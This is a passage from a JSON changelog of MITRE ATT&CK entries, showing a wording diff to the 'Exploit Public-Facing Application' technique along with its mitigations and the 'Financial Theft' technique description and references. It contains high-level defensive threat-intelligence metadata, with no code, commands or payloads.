                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['description']\": {\"new_value\": \"Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\\n\\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\\n\\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\\n\\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\\n\\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)\", \"old_value\": \"Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\\n\\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\\n\\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\\n\\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\\n\\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)\", \"diff\": \"--- \\n+++ \\n@@ -1,6 +1,6 @@\\n Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\\n \\n-Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\\n+Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\\n \\n If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\\n \"}}}",
                    "previous_version": "2.8",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to13__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to13__0\"><a href=\"#difflib_chg_to13__top\">t</a></td><td class=\"diff_header\" id=\"from13_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;exploit&nbsp;a&nbsp;weakness&nbsp;in&nbsp;an&nbsp;Internet</td><td class=\"diff_next\"><a href=\"#difflib_chg_to13__top\">t</a></td><td class=\"diff_header\" id=\"to13_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;exploit&nbsp;a&nbsp;weakness&nbsp;in&nbsp;an&nbsp;Internet</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-facing&nbsp;host&nbsp;or&nbsp;system&nbsp;to&nbsp;initially&nbsp;access&nbsp;a&nbsp;network.&nbsp;The&nbsp;we</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-facing&nbsp;host&nbsp;or&nbsp;system&nbsp;to&nbsp;initially&nbsp;access&nbsp;a&nbsp;network.&nbsp;The&nbsp;we</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">akness&nbsp;in&nbsp;the&nbsp;system&nbsp;can&nbsp;be&nbsp;a&nbsp;software&nbsp;bug,&nbsp;a&nbsp;temporary&nbsp;glit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">akness&nbsp;in&nbsp;the&nbsp;system&nbsp;can&nbsp;be&nbsp;a&nbsp;software&nbsp;bug,&nbsp;a&nbsp;temporary&nbsp;glit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ch,&nbsp;or&nbsp;a&nbsp;misconfiguration.&nbsp;&nbsp;Exploited&nbsp;applications&nbsp;are&nbsp;often</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ch,&nbsp;or&nbsp;a&nbsp;misconfiguration.&nbsp;&nbsp;Exploited&nbsp;applications&nbsp;are&nbsp;often</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;websites/web&nbsp;servers,&nbsp;but&nbsp;can&nbsp;also&nbsp;include&nbsp;databases&nbsp;(like&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;websites/web&nbsp;servers,&nbsp;but&nbsp;can&nbsp;also&nbsp;include&nbsp;databases&nbsp;(like&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">SQL),&nbsp;standard&nbsp;services&nbsp;(like&nbsp;SMB&nbsp;or&nbsp;SSH),&nbsp;network&nbsp;device&nbsp;ad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">SQL),&nbsp;standard&nbsp;services&nbsp;(like&nbsp;SMB&nbsp;or&nbsp;SSH),&nbsp;network&nbsp;device&nbsp;ad</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ministration&nbsp;and&nbsp;management&nbsp;protocols&nbsp;(like&nbsp;SNMP&nbsp;and&nbsp;Smart&nbsp;I</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ministration&nbsp;and&nbsp;management&nbsp;protocols&nbsp;(like&nbsp;SNMP&nbsp;and&nbsp;Smart&nbsp;I</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nstall),&nbsp;and&nbsp;any&nbsp;other&nbsp;system&nbsp;with&nbsp;Internet-accessible&nbsp;open&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nstall),&nbsp;and&nbsp;any&nbsp;other&nbsp;system&nbsp;with&nbsp;Internet-accessible&nbsp;open&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sockets.(Citation:&nbsp;NVD&nbsp;CVE-2016-6662)(Citation:&nbsp;CIS&nbsp;Multiple</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sockets.(Citation:&nbsp;NVD&nbsp;CVE-2016-6662)(Citation:&nbsp;CIS&nbsp;Multiple</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;SMB&nbsp;Vulnerabilities)(Citation:&nbsp;US-CERT&nbsp;TA18-106A&nbsp;Network&nbsp;In</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;SMB&nbsp;Vulnerabilities)(Citation:&nbsp;US-CERT&nbsp;TA18-106A&nbsp;Network&nbsp;In</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">frastructure&nbsp;Devices&nbsp;2018)(Citation:&nbsp;Cisco&nbsp;Blog&nbsp;Legacy&nbsp;Devic</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">frastructure&nbsp;Devices&nbsp;2018)(Citation:&nbsp;Cisco&nbsp;Blog&nbsp;Legacy&nbsp;Devic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;Attacks)(Citation:&nbsp;NVD&nbsp;CVE-2014-7169)&nbsp;On&nbsp;ESXi&nbsp;infrastructu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;Attacks)(Citation:&nbsp;NVD&nbsp;CVE-2014-7169)&nbsp;On&nbsp;ESXi&nbsp;infrastructu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re,&nbsp;adversaries&nbsp;may&nbsp;exploit&nbsp;exposed&nbsp;OpenSLP&nbsp;services;&nbsp;they&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re,&nbsp;adversaries&nbsp;may&nbsp;exploit&nbsp;exposed&nbsp;OpenSLP&nbsp;services;&nbsp;they&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ay&nbsp;alternatively&nbsp;exploit&nbsp;exposed&nbsp;VMware&nbsp;vCenter&nbsp;servers.(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ay&nbsp;alternatively&nbsp;exploit&nbsp;exposed&nbsp;VMware&nbsp;vCenter&nbsp;servers.(Cit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Recorded&nbsp;Future&nbsp;ESXiArgs&nbsp;Ransomware&nbsp;2023)(Citation:&nbsp;A</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Recorded&nbsp;Future&nbsp;ESXiArgs&nbsp;Ransomware&nbsp;2023)(Citation:&nbsp;A</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rs&nbsp;Technica&nbsp;VMWare&nbsp;Code&nbsp;Execution&nbsp;Vulnerability&nbsp;2021)&nbsp;Depend</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rs&nbsp;Technica&nbsp;VMWare&nbsp;Code&nbsp;Execution&nbsp;Vulnerability&nbsp;2021)&nbsp;Depend</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;on&nbsp;the&nbsp;flaw&nbsp;being&nbsp;exploited,&nbsp;this&nbsp;may&nbsp;also&nbsp;involve&nbsp;[Expl</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;on&nbsp;the&nbsp;flaw&nbsp;being&nbsp;exploited,&nbsp;this&nbsp;may&nbsp;also&nbsp;involve&nbsp;[Expl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oitation&nbsp;for&nbsp;<span class=\"diff_chg\">Defense&nbsp;Evasion</span>](https://attack.mitre.org/techn</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oitation&nbsp;for&nbsp;<span class=\"diff_chg\">Stealth</span>](https://attack.mitre.org/techniques/T1</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iques/T1211)&nbsp;or&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">211)&nbsp;or&nbsp;[Exploitation&nbsp;for&nbsp;Client&nbsp;Execution](https://attack.m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attack.mitre.org/techniques/T1203).&nbsp;&nbsp;If&nbsp;an&nbsp;application&nbsp;is&nbsp;ho</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itre.org/techniques/T1203).&nbsp;&nbsp;If&nbsp;an&nbsp;application&nbsp;is&nbsp;hosted&nbsp;on&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sted&nbsp;on&nbsp;cloud-based&nbsp;infrastructure&nbsp;and/or&nbsp;is&nbsp;containerized,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cloud-based&nbsp;infrastructure&nbsp;and/or&nbsp;is&nbsp;containerized,&nbsp;then&nbsp;exp</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">then&nbsp;exploiting&nbsp;it&nbsp;may&nbsp;lead&nbsp;to&nbsp;compromise&nbsp;of&nbsp;the&nbsp;underlying&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">loiting&nbsp;it&nbsp;may&nbsp;lead&nbsp;to&nbsp;compromise&nbsp;of&nbsp;the&nbsp;underlying&nbsp;instance</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">instance&nbsp;or&nbsp;container.&nbsp;This&nbsp;can&nbsp;allow&nbsp;an&nbsp;adversary&nbsp;a&nbsp;path&nbsp;to</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;container.&nbsp;This&nbsp;can&nbsp;allow&nbsp;an&nbsp;adversary&nbsp;a&nbsp;path&nbsp;to&nbsp;access&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;access&nbsp;the&nbsp;cloud&nbsp;or&nbsp;container&nbsp;APIs&nbsp;(e.g.,&nbsp;via&nbsp;the&nbsp;[Cloud&nbsp;In</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">the&nbsp;cloud&nbsp;or&nbsp;container&nbsp;APIs&nbsp;(e.g.,&nbsp;via&nbsp;the&nbsp;[Cloud&nbsp;Instance&nbsp;M</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stance&nbsp;Metadata&nbsp;API](https://attack.mitre.org/techniques/T15</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">etadata&nbsp;API](https://attack.mitre.org/techniques/T1552/005))</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">52/005)),&nbsp;exploit&nbsp;container&nbsp;host&nbsp;access&nbsp;via&nbsp;[Escape&nbsp;to&nbsp;Host]</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;exploit&nbsp;container&nbsp;host&nbsp;access&nbsp;via&nbsp;[Escape&nbsp;to&nbsp;Host](https:/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/techniques/T1611),&nbsp;or&nbsp;take&nbsp;advanta</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/attack.mitre.org/techniques/T1611),&nbsp;or&nbsp;take&nbsp;advantage&nbsp;of&nbsp;we</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ge&nbsp;of&nbsp;weak&nbsp;identity&nbsp;and&nbsp;access&nbsp;management&nbsp;policies.&nbsp;&nbsp;Adversa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ak&nbsp;identity&nbsp;and&nbsp;access&nbsp;management&nbsp;policies.&nbsp;&nbsp;Adversaries&nbsp;may</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ries&nbsp;may&nbsp;also&nbsp;exploit&nbsp;edge&nbsp;network&nbsp;infrastructure&nbsp;and&nbsp;relate</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;also&nbsp;exploit&nbsp;edge&nbsp;network&nbsp;infrastructure&nbsp;and&nbsp;related&nbsp;applia</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;appliances,&nbsp;specifically&nbsp;targeting&nbsp;devices&nbsp;that&nbsp;do&nbsp;not&nbsp;sup</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nces,&nbsp;specifically&nbsp;targeting&nbsp;devices&nbsp;that&nbsp;do&nbsp;not&nbsp;support&nbsp;rob</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">port&nbsp;robust&nbsp;host-based&nbsp;defenses.(Citation:&nbsp;Mandiant&nbsp;Fortinet</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ust&nbsp;host-based&nbsp;defenses.(Citation:&nbsp;Mandiant&nbsp;Fortinet&nbsp;Zero&nbsp;Da</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Zero&nbsp;Day)(Citation:&nbsp;Wired&nbsp;Russia&nbsp;Cyberwar)&nbsp;&nbsp;For&nbsp;websites&nbsp;an</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y)(Citation:&nbsp;Wired&nbsp;Russia&nbsp;Cyberwar)&nbsp;&nbsp;For&nbsp;websites&nbsp;and&nbsp;databa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;databases,&nbsp;the&nbsp;OWASP&nbsp;top&nbsp;10&nbsp;and&nbsp;CWE&nbsp;top&nbsp;25&nbsp;highlight&nbsp;the&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ses,&nbsp;the&nbsp;OWASP&nbsp;top&nbsp;10&nbsp;and&nbsp;CWE&nbsp;top&nbsp;25&nbsp;highlight&nbsp;the&nbsp;most&nbsp;comm</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ost&nbsp;common&nbsp;web-based&nbsp;vulnerabilities.(Citation:&nbsp;OWASP&nbsp;Top&nbsp;10</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;web-based&nbsp;vulnerabilities.(Citation:&nbsp;OWASP&nbsp;Top&nbsp;10)(Citati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)(Citation:&nbsp;CWE&nbsp;top&nbsp;25)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;CWE&nbsp;top&nbsp;25)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1016: Vulnerability Scanning",
                            "M1026: Privileged Account Management",
                            "M1030: Network Segmentation",
                            "M1035: Limit Access to Resource Over Network",
                            "M1037: Filter Network Traffic",
                            "M1048: Application Isolation and Sandboxing",
                            "M1050: Exploit Protection",
                            "M1051: Update Software"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0080: Exploit Public-Facing Application \u2013 multi-signal correlation (request \u2192 error \u2192 post-exploit process/egress)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-08-18 20:50:04.222000+00:00",
                    "modified": "2026-04-17 16:12:12.496000+00:00",
                    "name": "Financial Theft",
                    "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1684/001) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "impact"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1657",
                            "external_id": "T1657"
                        },
                        {
                            "source_name": "VEC",
                            "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.",
                            "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."
                        },
                        {
                            "source_name": "Crowdstrike-leaks",
                            "description": "Crowdstrike. (2020, September 24). Double Trouble: Ransomware with Data Leak Extortion, Part 1. Retrieved December 6, 2023.",
                            "url": "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"
                        },
                        {
                            "source_name": "Mandiant-leaks",
                            "description": "DANIEL KAPELLMANN ZAFRA, COREY HIDELBRANDT, NATHAN BRUBAKER, KEITH LUNDEN. (2022, January 31). 1 in 7 OT Ransomware Extortion Attacks Leak Critical Operational Technology Information. Retrieved August 18, 2023.",
                            "url": "https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs"
                        },
                        {
                            "source_name": "DOJ-DPRK Heist",
                            "description": "Department of Justice. (2021). 3 North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyber-attacks and Financial Crimes Across the Globe. Retrieved August 18, 2023.",
                            "url": "https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and"
                        },
                        {
                            "source_name": "FBI-BEC",
                            "description": "FBI. (2022). FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud. Retrieved August 18, 2023.",
                            "url": "https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view"
                        },
                        {
                            "source_name": "FBI-ransomware",
                            "description": "FBI. (n.d.). Ransomware. Retrieved August 18, 2023.",
                            "url": "https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf"
                        },
                        {
                            "source_name": "AP-NotPetya",
                            "description": "FRANK BAJAK AND RAPHAEL SATTER. (2017, June 30). Companies still hobbled from fearsome cyberattack. Retrieved August 18, 2023.",
                            "url": "https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2"
                        },
                        {
                            "source_name": "Internet crime report 2022",
                            "description": "IC3. (2022). 2022 Internet Crime Report. Retrieved August 18, 2023.",
                            "url": "https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf"
                        },
                        {
                            "source_name": "BBC-Ronin",
                            "description": "Joe Tidy. (2022, March 30). Ronin Network: What a $600m hack says about the state of crypto. Retrieved August 18, 2023.",
                            "url": "https://www.bbc.com/news/technology-60933174"
                        },
                        {
                            "source_name": "wired-pig butchering",
                            "description": "Lily Hay Newman. (n.d.). \u2018Pig Butchering\u2019 Scams Are Now a $3 Billion Threat. Retrieved August 18, 2023.",
                            "url": "https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/"
                        },
                        {
                            "source_name": "NYT-Colonial",
                            "description": "Nicole Perlroth. (2021, May 13). Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers.. Retrieved August 18, 2023.",
                            "url": "https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Blake Strom, Microsoft Threat Intelligence",
                        "Pawel Partyka, Microsoft Threat Intelligence",
                        "Menachem Goldstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_impact_type": [
                        "Availability"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.2",
